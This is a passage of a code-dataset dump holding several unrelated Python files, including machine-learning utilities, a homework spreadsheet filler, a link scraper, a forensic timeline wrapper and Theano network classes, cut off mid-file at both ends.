Compute the proximal operator of the squared \f$\ell_2\f$ - norm\n\n    \\f$ prox_{\\lambda \\|.\\|_2^2} = {arg\\min_x}\\left\\{\\frac{1}{2}\\|x\\|_2^2 + \\frac{1}{2\\lambda}\\|x - w\\|^2\\right\\} \\f$\n    \n    Parameters\n    ---------- \n    @param x : input vector\n    @param lbd : penalty parameter\n    \n    Returns\n    ---------- \n    @retval : the input vector rescaled by 1/(1 + lbd)\n    \"\"\"\n    return (1.0 / (1.0 + lbd)) * x\n\ndef compute_snapshot_grad_est(f_compute_grad, obs, acts, rws):\n    # compute policy gradient\n    v_est = f_compute_grad(obs[0], acts[0], rws[0])\n    for ob,ac,rw in zip(obs[1:],acts[1:],rws[1:]):\n        g_i = f_compute_grad(ob, ac, rw)\n        v_est = [sum(x) for x in zip(v_est,g_i)]\n    v_est = [x/len(obs) for x in v_est]\n\n    return v_est\n\ndef compute_hybrid_spg_est(f_compute_grad,f_compute_grad_diff,f_importance_weights,path_info_1,path_info_2,beta,v_est):\n    sub_observations_1 = path_info_1['obs']\n    sub_actions_1 = path_info_1['acts']\n    sub_d_rewards_1 = path_info_1['rws']\n\n    sub_observations_2 = path_info_2['obs']\n    sub_actions_2 = path_info_2['acts']\n    sub_d_rewards_2 = path_info_2['rws']\n\n    iw = f_importance_weights(sub_observations_1[0],sub_actions_1[0])\n    grad_diff = f_compute_grad_diff(sub_observations_1[0],sub_actions_1[0],sub_d_rewards_1[0],iw)\n    u_est = f_compute_grad(sub_observations_2[0],sub_actions_2[0],sub_d_rewards_2[0])\n\n    for ob_1,ac_1,rw_1,ob_2,ac_2,rw_2 in zip(sub_observations_1[1:],sub_actions_1[1:],sub_d_rewards_1[1:],\\\n        sub_observations_2[1:],sub_actions_2[1:],sub_d_rewards_2[1:]):\n        iw = f_importance_weights(ob_1,ac_1)\n        grad_diff = [sum(x) for x in zip(grad_diff,f_compute_grad_diff(ob_1,ac_1,rw_1,iw))]\n        u_est = [sum(x) for x in zip(u_est,f_compute_grad(ob_2,ac_2,rw_2))]\n\n    grad_diff = [x/len(sub_observations_1) for x in grad_diff]\n    u_est = [x/len(sub_observations_2) for x in u_est]\n    v_est = [beta*(v + grad_d) + (1-beta) * u for v,grad_d,u in zip(v_est,grad_diff,u_est)]\n\n    return v_est","sub_path":"utils/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":4535,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"368104599","text":"# -*- coding:utf-8 -*-\nimport openpyxl as op\nfrom platform import system as psys\nfrom os import system as osys,getcwd,path,remove\nimport configparser as cp\nimport datetime as dt\n\nps='\\\\' if psys()=='Windows' else '/'\n\nclass struct:\n    def __init__(self):\n        c=cp.ConfigParser()\n        c.read(path.dirname(path.realpath(__file__))+'/config.ini',encoding='utf-8')\n        self.subject=c['DEFAULT']['subject']\n        self.outputFileName=c['DEFAULT']['outputFileName']\n        self.templateName=c['DEFAULT']['templateName']\n        self.templateSheet=c['DEFAULT']['templateSheet']\n        self.correct=c['DEFAULT']['correct']\n        self.title=c['DEFAULT']['title']\n\nerr=list()\n\ndef is_Chinese(ch):\n    if '\\u4e00' <= ch <= '\\u9fff':\n        return True\n    return False\n\ndef func():\n    c=struct()\n    wb=op.load_workbook(c.templateName)\n    ws=wb[c.templateSheet]\n    wb.close()\n    sid=dict()\n    i='A'\n    ws['A1']=c.title.format(month=dt.datetime.now().strftime(\"%m\"),day=dt.datetime.now().strftime(\"%d\"))\n    for cell in ws[2]:\n        sid[cell.value]=i\n        i=chr(ord(i)+1)\n    nid,i=dict(),0\n    for name in ws[sid['姓名']]:\n        i+=1\n        if i<=2:\n            continue\n        nid[name.value]=i\n    fp=getcwd()+ps+'input.txt'\n    inf=open(fp,'w+')\n    inf.close()\n    print('''Please open %s and type the content into that file.\nIn general, the first line should contain an @.\nIf the data has sequence numbers, add an I after the @;\nif the data carries extra notes, add a C after the @.\n(Both may appear together, case-insensitive. If the result is @I/@i, the line can be omitted.)\nIf none of the above applies, the first line should contain exactly one @.\nOnce the input is done,'''%fp)\n    nc,ni=True,True\n    if psys()==\"Windows\":\n        osys(\"pause\")\n    else:\n        print('Type anything here and press Enter to continue...')\n        input()\n
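A quick numeric check of the two proximal operators from the utils.py record above: soft-thresholding for the l1 norm and a uniform rescaling for the squared l2 norm (toy vector, illustrative values only):

import numpy as np

w = np.array([-3.0, -0.5, 0.0, 0.5, 3.0])
lamb = 1.0

# l1 prox: entries inside [-lamb, lamb] collapse to zero,
# everything else shrinks toward zero by lamb
print(np.sign(w) * np.maximum(np.abs(w) - lamb, 0))  # [-2. -0.  0.  0.  2.]

# squared-l2 prox: plain rescaling by 1/(1 + lamb)
print((1.0 / (1.0 + lamb)) * w)  # [-1.5  -0.25  0.  0.25  1.5]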
    with open(fp,'r',encoding='utf-8') as f:\n        mstr=f.readline().strip()\n        if mstr and mstr[0]=='@':\n            mstr=mstr.upper()\n            if 'C' in mstr:\n                nc=False\n            if 'I' in mstr:\n                ni=False\n            mstr=f.readline().strip()\n        else:\n            ni=False\n        while mstr:\n            try:\n                if mstr=='':\n                    continue\n                if nc and ni:\n                    ws['%s%d'%(sid[c.subject],nid[mstr])]=c.correct\n                else:\n                    ns=0\n                    if not ni:\n                        ns=-1\n                        for i in range(0,len(mstr)):\n                            ch=mstr[i]\n                            if is_Chinese(ch):\n                                if ns==-1:\n                                    ns=i\n                                break\n                    else:\n                        ns=0\n                    if not nc:\n                        ne=-1\n                        for i in range(1,len(mstr)+1):\n                            ch=mstr[-i]\n                            if is_Chinese(ch):\n                                if ne==-1:\n                                    ne=-i+1\n                                break\n                    else:\n                        ne=len(mstr)\n                    ws['%s%d'%(sid[c.subject],nid[mstr[ns:ne]])]=c.correct if nc else mstr[ne:]\n                    pass\n            except:\n                err.append(mstr)\n            mstr=f.readline().strip()\n    if path.exists(fp):\n        remove(fp)\n    wb.save(c.outputFileName)\n    print('File written to %s'%(getcwd()+ps+c.outputFileName))\n    if len(err)!=0:\n        print('The following entries could not be processed:')\n        for mstr in err:\n            print(mstr)\n\nif __name__=='__main__':\n    try:\n        func()\n    except KeyboardInterrupt:\n        pass\n    except Exception as e:\n        print('The program hit an error')\n        print(e)\n\n    if psys()==\"Windows\":\n        osys('pause')\n","sub_path":"Homework/newHomework.py","file_name":"newHomework.py","file_ext":"py","file_size_in_byte":3867,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"577542327","text":"def fetch_rpm_from_url(spec, module=None):\n    (package_name, _) = os.path.splitext(str(spec.rsplit('/', 1)[1]))\n    package_file = tempfile.NamedTemporaryFile(prefix=package_name, suffix='.rpm', delete=False)\n    module.add_cleanup_file(package_file.name)\n    try:\n        (rsp, info) = fetch_url(module, spec)\n        if (not rsp):\n            module.fail_json(msg=('Failure downloading %s, %s' % (spec, info['msg'])))\n        data = rsp.read(BUFSIZE)\n        while data:\n            package_file.write(data)\n            data = rsp.read(BUFSIZE)\n        package_file.close()\n    except Exception as e:\n        if module:\n            module.fail_json(msg=('Failure downloading %s, %s' % (spec, to_native(e))))\n        else:\n            raise e\n    return package_file.name","sub_path":"Data Set/bug-fixing-5/f31696f77fc248d06f4fd5f3f7ca875b87aec81d--fix.py","file_name":"f31696f77fc248d06f4fd5f3f7ca875b87aec81d--fix.py","file_ext":"py","file_size_in_byte":773,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"327874030","text":"import requests\nimport csv\nfrom bs4 import BeautifulSoup\nimport re\n\nmat = open('Materias.csv', 'w')\narq = open('Soup.csv', 'r').readlines()\nn = 1\n\n# url = f'https://www.sitequevocequer.com.br/blog/page/{n}/'\n# res = requests.get('https://www.sitequevocequer.com.br/blog/')\n# res = requests.get(url)\n# soup =BeautifulSoup(res.text,'lxml')\n\n# hi = soup.select('title')\n#\n# x= soup.find_all('a')\n\n\n# limite=13\n\n\n# end = list()\n# end2 = list()\n\n# while n<=limite:\n#     url = f'https://www.sitequevocequer.com.br/blog/page/{n}/'\n#     # res = requests.get('https://www.sitequevocequer.com.br/blog/')\n#     res = requests.get(url)\n#     soup = BeautifulSoup(res.text, 'lxml')\n\n#     for link in soup.find_all('a'): # grab the links on the page\n#         end.append(link.get('href'))\n\n#     for link in end:\n#         if link not in end2:\n#             end2.append(link)\n#     print(f'page {n} being scraped!!!')\n#     print(f'the link list has {len(end2)} values')\n#     n+=1\n\n# for v in end2:\n#     arq.write('\\n'+v)\n\n\nx = 1\n\nlimite = 526\nlimit = 1\nend = list()\nend2 = list()\n\nwhile x <= limite:\n\n    url = arq[x]\n    res = requests.get(url)\n    soup = BeautifulSoup(res.text, 
'lxml')\n\n    for link in soup.find_all('a'): # grab the links on the page\n        end.append(link.get('href'))\n    for link in end:\n        if link not in end2:\n            # if 'bit.ly' in link:\n            # if re.search(str(\"bit.ly\"),str(link)):\n            if str('bit.ly') in str(link):\n                end2.append(link)\n            else:\n                pass\n\n    print(f'address {x}\\n is being scraped\\nthe link list has {len(end2)} values!!!!')\n    for v in end2:\n\n        try:\n            mat.write(f'\\nPage: {url} contains: {v}\\n\\n')\n        except:\n            print('Error while writing')\n    x += 1\n\n# for v in soup.find_all('a'):\n#     print(v)\n\n# print(hi)\n\n\n# print(hi[0].getText())\n\n# print(soup.title.string)\n\n\n# print(soup.p)\n","sub_path":"Dracula_v2.py","file_name":"Dracula_v2.py","file_ext":"py","file_size_in_byte":1882,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"231014052","text":"\"\"\"\n    MLA : machine learning algorithm\n\"\"\"\n#\nimport pandas as pd\n\n# common Model Algorithms\nfrom sklearn import svm, tree, linear_model, neighbors, naive_bayes, ensemble, discriminant_analysis, gaussian_process\nfrom xgboost import XGBClassifier\n\n#Common Model Helpers\nfrom sklearn.preprocessing import OneHotEncoder, LabelEncoder\nfrom sklearn import feature_selection\nfrom sklearn import model_selection\nfrom sklearn import metrics\n\n# visualization\nimport matplotlib.pyplot as plt\nimport matplotlib as mpl\nimport matplotlib.pylab as pylab\nimport seaborn as sns\n\nMLA = [\n    # Ensemble Methods\n    ensemble.AdaBoostClassifier(),\n    ensemble.BaggingClassifier(),\n    ensemble.ExtraTreesClassifier(),\n    ensemble.GradientBoostingClassifier(),\n    ensemble.RandomForestClassifier(),\n\n    # Gaussian Process\n    gaussian_process.GaussianProcessClassifier(),\n\n    # GLM\n    linear_model.LogisticRegressionCV(),\n    linear_model.PassiveAggressiveClassifier(),\n    linear_model.RidgeClassifierCV(),\n    linear_model.SGDClassifier(),\n    linear_model.Perceptron(),\n\n    # Naive Bayes\n    naive_bayes.BernoulliNB(),\n    naive_bayes.GaussianNB(),\n\n    # Nearest Neighbor\n    neighbors.KNeighborsClassifier(),\n\n    # SVM\n    svm.SVC(probability=True),\n    svm.NuSVC(probability=True),\n    svm.LinearSVC(),\n\n    # Tree\n    tree.DecisionTreeClassifier(),\n    tree.ExtraTreeClassifier(),\n\n    # Discriminant Analysis\n    discriminant_analysis.LinearDiscriminantAnalysis(),\n    discriminant_analysis.QuadraticDiscriminantAnalysis(),\n\n    # xgboost\n    XGBClassifier()\n]\n\n# cv_split = model_selection.ShuffleSplit(n_splits=10, test_size=.3, train_size=.6, random_state=0)\ncv_split = model_selection.ShuffleSplit(n_splits=10, train_size=.6, test_size=.3, random_state=0)\n\nMLA_columns = [\"MLA Name\", \"MLA Parameters\", \"MLA Train Accuracy Mean\", \"MLA Test Accuracy Mean\", \"MLA Test Accuracy 3*STD\", \"MLA Time\"]\nMLA_compare = pd.DataFrame(columns=MLA_columns)\n\ndata1 = pd.read_csv(\"data/pre_processing/processed_train5.csv\")\nX = data1.drop([\"PassengerId\", \"Survived\"], axis=1).values\nY = data1[[\"Survived\"]].values\n\nMLA_predict = Y\n\nrow_index = 0\n\nfor alg in MLA:\n    MLA_name = alg.__class__.__name__\n    MLA_compare.loc[row_index, \"MLA Name\"] = MLA_name\n    MLA_compare.loc[row_index, \"MLA Parameters\"] = str(alg.get_params())\n\n    cv_results = model_selection.cross_validate(alg, X, Y, cv=cv_split, return_train_score=True)\n\n    MLA_compare.loc[row_index, \"MLA Time\"] = cv_results[\"fit_time\"].mean()\n    MLA_compare.loc[row_index, \"MLA Train Accuracy Mean\"] = cv_results[\"train_score\"].mean()\n    MLA_compare.loc[row_index, \"MLA Test Accuracy Mean\"] = cv_results[\"test_score\"].mean()\n
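The mla.py comparison loop being filled in here works the same on any estimator list; a minimal self-contained rendition on synthetic data (make_classification and two small models stand in for the record's processed_train5.csv and its full MLA list):

import pandas as pd
from sklearn.datasets import make_classification
from sklearn import model_selection, naive_bayes, tree

X_demo, y_demo = make_classification(n_samples=200, n_features=10, random_state=0)
split = model_selection.ShuffleSplit(n_splits=5, train_size=0.6,
                                     test_size=0.3, random_state=0)

rows = []
for alg in [naive_bayes.GaussianNB(), tree.DecisionTreeClassifier()]:
    cv = model_selection.cross_validate(alg, X_demo, y_demo, cv=split,
                                        return_train_score=True)
    rows.append({'name': alg.__class__.__name__,
                 'train_acc': cv['train_score'].mean(),
                 'test_acc': cv['test_score'].mean()})

print(pd.DataFrame(rows).sort_values('test_acc', ascending=False))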
    MLA_compare.loc[row_index, \"MLA Test Accuracy 3*STD\"] = cv_results[\"test_score\"].std() * 3\n\n    #alg.fit(X, Y)\n    #MLA_predict[MLA_name] = alg.predict(X)\n\n    row_index += 1\n\nMLA_compare.sort_values(by=['MLA Test Accuracy Mean'], ascending=False, inplace=True)\nprint(MLA_compare)\nsns.barplot(x='MLA Test Accuracy Mean', y='MLA Name', data=MLA_compare, color='m')\nplt.show()","sub_path":"mla.py","file_name":"mla.py","file_ext":"py","file_size_in_byte":3051,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"474487415","text":"from pyramid.view import (\n    view_config,\n    view_defaults\n)\n\nimport mysql_config\n\n\n@view_defaults(renderer='mysql/mysql.html')\nclass MySqlViews:\n    def __init__(self, request):\n        self.request = request\n\n    @view_config(route_name='mysql')\n    def home(self):\n        return {\n            \"mysql\": mysql_config.get_mysql_config(),\n            \"content_block_title\": \"MySQL settings\"\n        }\n\n    @view_config(route_name='mysql_conf', renderer='json')\n    def mysql_conf(self):\n        return {\n            \"config\": mysql_config.get_mysql_config_text()\n        }\n\n    @view_config(route_name='mysql_conf_save', renderer='json')\n    def mysql_conf_save(self):\n        if \"config\" in self.request.POST:\n            return {\n                \"result\": mysql_config.save_mysql_config(self.request.POST[\"config\"])\n            }\n        else:\n            return {\n                \"result\": \"Error: incorrect data!\"\n            }\n\n","sub_path":"rigery_panel/modules/mysql/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":936,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"111561511","text":"fileObj = open('text')\r\n#print(fileObj.read()) # prints the whole file at once\r\n#print(fileObj.read(2)) # reads the first two characters of the file\r\n#print(fileObj.readline()) # prints a single line\r\n#print(fileObj.readline())\r\n#fileObj.close()\r\n\r\n# program to read line by line using the readline method\r\n#line = fileObj.readline()\r\n#while line != \"\":\r\n#    print(line)\r\n#    line = fileObj.readline()\r\n\r\nlines = fileObj.readlines() # collects all the lines into a list\r\nfor l in lines:\r\n    print(l)\r\nprint(lines[3])\r\nfileObj.close()\r\n\r\nwith open('text', 'r') as reader:\r\n    content = reader.readlines()\r\n    with open('text', 'w') as writer:\r\n        for line in reversed(content):\r\n            writer.write(line)","sub_path":"PythonBasics/DemoReadWrite.py","file_name":"DemoReadWrite.py","file_ext":"py","file_size_in_byte":736,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"334526629","text":"import os\nimport glob\nimport pandas as pd\nimport subprocess as sp\nimport ColorTextWriter\n\nclass FeatureCounter:\n\n    def __init__(self, home_dir, input_dir, gfeature, stranded, feature_dir, feature_file, extensions, seq_method):\n        self.home_dir = home_dir\n        self.input_dir = input_dir\n        self.gfeature = gfeature\n        self.stranded = stranded\n        self.feature_dir = feature_dir\n        self.feature_file = feature_file\n        self.extensions = extensions\n        self.seq_method = seq_method\n\n    def feature(self):\n\n        bam_list = sorted(glob.glob(self.input_dir + '*.bam'))\n\n        ctw = ColorTextWriter.ColorTextWriter()\n\n        print(ctw.CBEIGE + ctw.CBOLD + 'Feature counting started ...' + ctw.CEND + '\\n')\n\n        i = 0\n        while i < len(self.gfeature):\n\n            outdir = os.path.join(self.home_dir, 'featureCounts' + '_' + self.gfeature[i])\n            if not os.path.isdir(outdir): os.mkdir(outdir)\n\n            print('\\n' + 'Quantifying ' + self.gfeature[i] + 's ...' 
+ '\\n')\n\n            command = [\n                'featureCounts -t', self.gfeature[i],\n                '-F GTF -g gene_name -O -M -s', self.stranded\n            ]\n\n            if self.seq_method == 'paired': command.extend(['-p -B -C'])\n\n            command.extend([\n                '-a', self.feature_dir + self.feature_file.split('.gz')[0],\n                '-o', outdir + '/' + self.gfeature[i] + self.extensions[3],\n                ' '.join([self.input_dir + '{0}'.format(j.split(self.input_dir)[1]) for j in bam_list])\n            ])\n\n            command = ' '.join(command)\n            sp.check_call(command, shell=True)\n\n            ### Manipulating the FeatureCounts output\n            data = pd.read_csv(outdir + '/' + self.gfeature[i] + self.extensions[3], sep='\\t', header=0, index_col=0, skiprows=1)\n\n            data = data.drop(data.iloc[:, 0:4], axis=1)\n\n            data.to_csv(outdir + '/' + self.gfeature[i] + '_DESeq2_Input' + self.extensions[3], sep='\\t')\n\n            i = i + 1\n\n            if i == len(self.gfeature):\n                print('\\n' + ctw.CBEIGE + ctw.CBOLD + 'Feature counting done!!!' + ctw.CEND + '\\n')","sub_path":"scripts/FeatureCounter.py","file_name":"FeatureCounter.py","file_ext":"py","file_size_in_byte":2148,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"266686909","text":"from setuptools import setup,find_packages\r\n\r\nwith open('readme.md', 'r') as readme:\r\n    long_desc = readme.read()\r\n\r\nsetup(\r\n    name = 'wiktionaryparser-ml',\r\n    version = '0.0.1',\r\n    description = 'A tool to parse word data from wiktionary.com into a JSON object. Based on wiktionary parser by Suyash Behera',\r\n    long_description = long_desc,\r\n    long_description_content_type='text/markdown',\r\n    packages = ['', 'tests', 'utils'],\r\n    data_files=[('testOutput', ['tests/testOutput.json']), ('readme', ['readme.md']), ('requirements', ['requirements.txt'])],\r\n    author = 'Maksym Kozlenko',\r\n    author_email = 'max@kozlenko.info',\r\n    url = 'https://github.com/Maxim75/WiktionaryParser', \r\n    download_url = 'https://github.com/Maxim75/WiktionaryParser/archive/master.zip', \r\n    keywords = ['Parser', 'Wiktionary'],\r\n    install_requires = ['beautifulsoup4','requests'],\r\n    classifiers=[\r\n        'Development Status :: 5 - Production/Stable',\r\n        'License :: OSI Approved :: MIT License',\r\n    ],\r\n)","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":983,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"540334310","text":"#!/usr/bin/python3\n\nimport base64\nimport hashlib\nimport os\nimport sys\n\ni = 0\n\ndef pow(target):\n    global i\n    while True:\n        m = hashlib.md5()\n        m.update(str(i).encode())\n        h = m.hexdigest()\n        if h[:6] == target:\n            return i\n        i += 1\n\nif __name__ == '__main__':\n    # the 6-hex-char target prefix is expected as the first CLI argument\n    pow(sys.argv[1])\n","sub_path":"crypto/des/out-of-the-box/pow.py","file_name":"pow.py","file_ext":"py","file_size_in_byte":312,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"553007310","text":"#clamscan /home/work/NAS/usb -r -i --move=/home/work/NAS/clamscan\n\nfrom Forensic_function.global_function import *\nfrom global_variable import *\nfrom start_client_linux import sendMessageTopic\n\n\ndef log2timeline(data):\n    directory_image = data.get('directory_root') + '/image/image.E01'\n    directory = data.get('directory_root')\n\n    commandName = 'log2timeline.py'\n    directory_output = directory + '/' + commandName.split('.')[0] + '/all.plaso'\n    command = commandName + ' ' + directory_output + ' ' + directory_image + ' --partition all'\n    #sudo log2timeline.py /home/work/NAS/Kunde/test.plaso /home/work/NAS/Kunde/mount/ewf1 --partition 
all\n\n    commandListSudoDokumentation(command, directory)\n\ndef plaso(data):\n    directory = data.get('directory_root')\n    directory_image = directory + '/' + 'log2timeline' + '/all.plaso '\n\n    commandName = 'psort.py'\n\n    directory_output = directory + '/' + commandName.split('.')[0] + '/datei.csv'\n    #clamscan /home/work/NAS/Kunde/usb -r -i --copy=/home/work/NAS/Kunde/clamscan\n    command = commandName + ' ' + directory_image + ' -w' + directory_output\n    #foremost -o /home/work/Desktop/Tipp -i /home/work/NAS/Kunde/image/image.E01 -T\n    #log2timeline /home/work/NAS/Kunde/log2timeline /home/work/NAS/Kunde/image/image.E01log\n\n    commandListSudoDokumentation(command, directory)\n\n\n\ndef timeline(data):\n    print('step six started')\n    log2timeline(data)\n    plaso(data)\n\n    print('step six finished')\n\n    routing_key = routingkeysNachbedingung.get('Timeline') # the criterion used to route to the right queue\n    # is the message actually needed???\n    sendMessageTopic(routing_key, data)\n\n\nif __name__ == \"__main__\" :\n    timeline(DATA)","sub_path":"Forensic_function/Linux/plaso.py","file_name":"plaso.py","file_ext":"py","file_size_in_byte":1722,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"429768565","text":"#!/usr/bin/env python\n\n\"\"\"\nLasagne implementation of CIFAR-10 examples from \"Deep Residual Learning for Image Recognition\" (http://arxiv.org/abs/1512.03385)\nCheck the accompanying files for pretrained models. The 32-layer network (n=5) achieves a validation error of 7.42%, \nwhile the 56-layer network (n=9) achieves an error of 6.75%, which is roughly equivalent to the examples in the paper.\n\"\"\"\n\nfrom __future__ import print_function\nfrom __future__ import division\n\nimport sys\nimport os\nimport time\nimport string\nimport random\nimport pickle\n\nimport numpy as np\nimport scipy.sparse as sp\nimport theano\nimport theano.tensor as T\nfrom theano import sparse\n#import lasagne\nfrom cLearn_utils import *\nimport matplotlib.pyplot as plt\n\nfrom sklearn.datasets import fetch_20newsgroups\nfrom sklearn.datasets import fetch_rcv1\nfrom sklearn.feature_extraction.text import TfidfVectorizer\nfrom sklearn.feature_extraction.text import HashingVectorizer\nfrom sklearn.feature_selection import SelectKBest, chi2\n\n# for the larger networks (n>=9), we need to adjust Python's recursion limit\nsys.setrecursionlimit(10000)\n\n# ##################### Load data from CIFAR-10 dataset #######################\n# this code assumes the cifar dataset from 'https://www.cs.toronto.edu/~kriz/cifar-10-python.tar.gz'\n# has been extracted in current working directory\n\n# ##################### Build the neural network model #######################\n\n#from lasagne.layers import Conv2DLayer as ConvLayer\n# from lasagne.layers.dnn import Conv2DDNNLayer as ConvLayer\n# from lasagne.layers import ElemwiseSumLayer\n# from lasagne.layers import InputLayer\n# from lasagne.layers import DenseLayer\n# from lasagne.layers import GlobalPoolLayer\n# from lasagne.layers import PadLayer\n# from lasagne.layers import ExpressionLayer\n# from lasagne.layers import NonlinearityLayer\n# from lasagne.layers import FlattenLayer\n# from lasagne.nonlinearities import softmax, rectify\n# from lasagne.layers import batch_norm\n\nclass HiddenLayer(object):\n    def __init__(self, rng, input, n_in, n_out, W=None, b=None, activation = T.tanh, inputIsSparse=True):\n        \"\"\"\n        Typical hidden layer of an MLP: units are fully-connected and have\n        sigmoidal activation 
function. Weight matrix W is of shape (n_in,n_out)\n and the bias vector b is of shape (n_out,).\n\n NOTE : The nonlinearity used here is tanh\n\n Hidden unit activation is given by: tanh(dot(input,W) + b)\n\n :type rng: np.random.RandomState\n :param rng: a random number generator used to initialize weights\n\n :type input: theano.tensor.dmatrix\n :param input: a symbolic tensor of shape (n_examples, n_in)\n\n :type n_in: int\n :param n_in: dimensionality of input\n\n :type n_out: int\n :param n_out: number of hidden units\n\n :type activation: theano.Op or function\n :param activation: Non linearity to be applied in the hidden\n layer\n\n \"\"\"\n self.input = input\n # if inputIsSparse:\n # activation = sparse.tanh\n # else:\n # activation = T.tanh\n\n # `W` is initialized with `W_values` which is uniformely sampled\n # from sqrt(-6./(n_in+n_hidden)) and sqrt(6./(n_in+n_hidden))\n # for tanh activation function\n # the output of uniform if converted using asarray to dtype\n # theano.config.floatX so that the code is runable on GPU\n # Note : optimal initialization of weights is dependent on the\n # activation function used (among other things).\n # For example, results presented in [Xavier10] suggest that you\n # should use 4 times larger initial weights for sigmoid\n # compared to tanh\n # We have no info for other function, so we use the same as\n # tanh.\n if W is None:\n W_values = np.asarray(rng.uniform(\n low=-np.sqrt(6. / (n_in + n_out)),\n high=np.sqrt(6. / (n_in + n_out)),\n size=(n_in, n_out)), dtype=theano.config.floatX)\n if activation == theano.tensor.nnet.sigmoid:\n W_values *= 4\n\n W = theano.shared(value=W_values, name='W', borrow=True)\n\n if b is None:\n b_values = np.zeros((n_out,), dtype=theano.config.floatX)\n b = theano.shared(value=b_values, name='b', borrow=True)\n\n self.W = W\n self.b = b\n\n if inputIsSparse:\n lin_output = sparse.structured_dot(input, self.W) + self.b\n else:\n lin_output = T.dot(input, self.W) + self.b\n\n # parameters of the model\n self.output = (lin_output if activation is None\n else activation(lin_output)) \n self.params = [self.W, self.b]\n\nclass LogisticRegression(object):\n \"\"\"Multi-class Logistic Regression Class\n\n The logistic regression is fully described by a weight matrix :math:`W`\n and bias vector :math:`b`. 
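The HiddenLayer above samples W from the Glorot/Xavier uniform range of +-sqrt(6/(n_in+n_out)), scaled 4x when the activation is sigmoid. A compact numpy rendering of just that initialization rule (a sketch of the same math outside Theano; the function name is illustrative):

import numpy as np

def glorot_uniform(rng, n_in, n_out, sigmoid=False):
    # tanh-appropriate bound; sigmoid layers get a 4x larger bound,
    # mirroring the HiddenLayer initialization above
    bound = np.sqrt(6.0 / (n_in + n_out))
    if sigmoid:
        bound *= 4.0
    return rng.uniform(low=-bound, high=bound, size=(n_in, n_out))

rng = np.random.RandomState(23455)
W = glorot_uniform(rng, 100, 50)
print(W.shape, float(np.abs(W).max()))  # bound is sqrt(6/150) = 0.2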
Classification is done by projecting data\n points onto a set of hyperplanes, the distance to which is used to\n determine a class membership probability.\n \"\"\"\n\n def __init__(self, input, n_in, n_out, inputIsSparse=True):\n \"\"\" Initialize the parameters of the logistic regression\n\n :type input: theano.tensor.TensorType\n :param input: symbolic variable that describes the input of the\n architecture (one minibatch)\n\n :type n_in: int\n :param n_in: number of input units, the dimension of the space in\n which the datapoints lie\n\n :type n_out: int\n :param n_out: number of output units, the dimension of the space in\n which the labels lie\n\n \"\"\"\n # start-snippet-1\n # initialize with 0 the weights W as a matrix of shape (n_in, n_out)\n self.W = theano.shared(\n value=np.zeros(\n (n_in, n_out),\n dtype=theano.config.floatX\n ),\n name='W',\n borrow=True\n )\n # initialize the biases b as a vector of n_out 0s\n self.b = theano.shared(\n value=np.zeros(\n (n_out,),\n dtype=theano.config.floatX\n ),\n name='b',\n borrow=True\n )\n\n # symbolic expression for computing the matrix of class-membership\n # probabilities\n # Where:\n # W is a matrix where column-k represent the separation hyperplane for\n # class-k\n # x is a matrix where row-j represents input training sample-j\n # b is a vector where element-k represent the free parameter of\n # hyperplane-k\n if inputIsSparse:\n self.p_y_given_x = T.nnet.softmax(sparse.structured_dot(input, self.W) + self.b)\n else:\n self.p_y_given_x = T.nnet.softmax(T.dot(input, self.W) + self.b)\n\n # symbolic description of how to compute prediction as class whose\n # probability is maximal\n self.y_pred = T.argmax(self.p_y_given_x, axis=1)\n # end-snippet-1\n\n # parameters of the model\n self.params = [self.W, self.b]\n\n # keep track of model input\n self.input = input\n\n def cost_vec(self, y):\n return -T.log(self.p_y_given_x)[T.arange(y.shape[0]), y]\n\n def cost(self, y):\n \"\"\"Return the mean of the negative log-likelihood of the prediction\n of this model under a given target distribution.\n\n .. math::\n\n \\frac{1}{|\\mathcal{D}|} \\mathcal{L} (\\theta=\\{W,b\\}, \\mathcal{D}) =\n \\frac{1}{|\\mathcal{D}|} \\sum_{i=0}^{|\\mathcal{D}|}\n \\log(P(Y=y^{(i)}|x^{(i)}, W,b)) \\\\\n \\ell (\\theta=\\{W,b\\}, \\mathcal{D})\n\n :type y: theano.tensor.TensorType\n :param y: corresponds to a vector that gives for each example the\n correct label\n\n Note: we use the mean instead of the sum so that\n the learning rate is less dependent on the batch size\n \"\"\"\n # start-snippet-2\n # y.shape[0] is (symbolically) the number of rows in y, i.e.,\n # number of examples (call it n) in the minibatch\n # T.arange(y.shape[0]) is a symbolic vector which will contain\n # [0,1,2,... 
n-1] T.log(self.p_y_given_x) is a matrix of\n # Log-Probabilities (call it LP) with one row per example and\n # one column per class LP[T.arange(y.shape[0]),y] is a vector\n # v containing [LP[0,y[0]], LP[1,y[1]], LP[2,y[2]], ...,\n # LP[n-1,y[n-1]]] and T.mean(LP[T.arange(y.shape[0]),y]) is\n # the mean (across minibatch examples) of the elements in v,\n # i.e., the mean log-likelihood across the minibatch.\n return -T.mean(T.log(self.p_y_given_x)[T.arange(y.shape[0]), y])\n # end-snippet-2\n\n def errors(self, y):\n \"\"\"Return a float representing the number of errors in the minibatch\n over the total number of examples of the minibatch ; zero one\n loss over the size of the minibatch\n\n :type y: theano.tensor.TensorType\n :param y: corresponds to a vector that gives for each example the\n correct label\n \"\"\"\n\n # check if y has same dimension of y_pred\n if y.ndim != self.y_pred.ndim:\n raise TypeError(\n 'y should have the same shape as self.y_pred',\n ('y', y.type, 'y_pred', self.y_pred.type)\n )\n # check if y is of the correct datatype\n if y.dtype.startswith('int'):\n # the T.neq operator returns a vector of 0s and 1s, 